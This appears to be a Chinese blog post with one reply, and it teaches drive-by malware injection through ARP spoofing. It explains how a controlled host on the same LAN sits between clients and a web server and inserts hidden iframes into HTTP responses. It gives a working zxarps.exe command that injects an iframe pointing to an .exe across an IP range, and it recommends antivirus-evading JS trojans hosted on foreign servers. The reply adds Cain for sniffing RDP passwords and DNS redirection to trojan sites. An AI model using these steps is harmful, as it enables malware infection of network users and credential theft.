iverson5

ARP挂马攻击

arp 挂马算是一个新出的挂马方式 网上的资料觉的还是很少 

所以就整理一下发出来 

简单讲下arp欺骗 

通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码, 

但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码 

目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很 

难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码. 

不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句. 


正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机 
arp中间人攻击时候: A---->C---->B 
B---->C---->A 
实际上,C在这里做了一次代理的作用 

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了. 

arp挂马的工具现在非常少  

个人认为LZX开发的zxarps.exe非常好 11K超级小 命令行下工具 

个人感觉命令行下的工具速度非常快 这个工具跟arpsniffer一样需要安 

装winpacp驱动  

如果是单纯的ARP嗅探我还是推荐cain 以前没怎么用过 用过一次才知道 真是好东西 不用安装驱动 可视化界面  

在DOS下输入zxarps.exe就会有帮助信息  

具体的我就不说了我只说一下挂马的参数  

比如自己的机器是192.168.2.14 

就输入zxarps.exe -idx 0 -ip 192.168.2.13-192.168.2.60 -port 80  

-insert "<iframe src=http://www.xxx.cn/xx.exe width=0 height=0>". 这样192.168.2.13-192.168.2.60 中间任何一台主机打开网页就会发现被插入挂马代码 

挂马的代码大家非常熟悉了 这里-idx 0 是网卡索引号 看几块网卡了  

-port 80就是在80端口 后面就是挂马的地址 有时候会扫不到alive host或者扫到的很少 大家换下IP范围就可以了 成功后会显示sniffering.. 

还有就是用iframe打开挂马页面会是空白 但是刚才问了下呆子 他说是可以的 

不过还是建议大家用JS挂马 网马现在还是06014免杀版的中马率比较  

大家都去国外的服务器挂吧 哈哈 就说这么多 累死我了 大家支持下

 

老大,无论是什么ARP工具,都需要一个驱动与网卡通信 
winpcap是必不可少的. 

CAIN 3.9可以捕获3389密码的. 
而且CAIN有arp-dns的功能,可以解析DNS到你挂马的网站. 
然后做个框架,效果要比直接ARp好. 
因为一般10W流量站,网关压力非常大的.你搞不好很容易整个LAN垮掉. 
一般10W流量需要1G内存+1G的网.

评论
热度(1)

iverson5

© iverson5 | Powered by LOFTER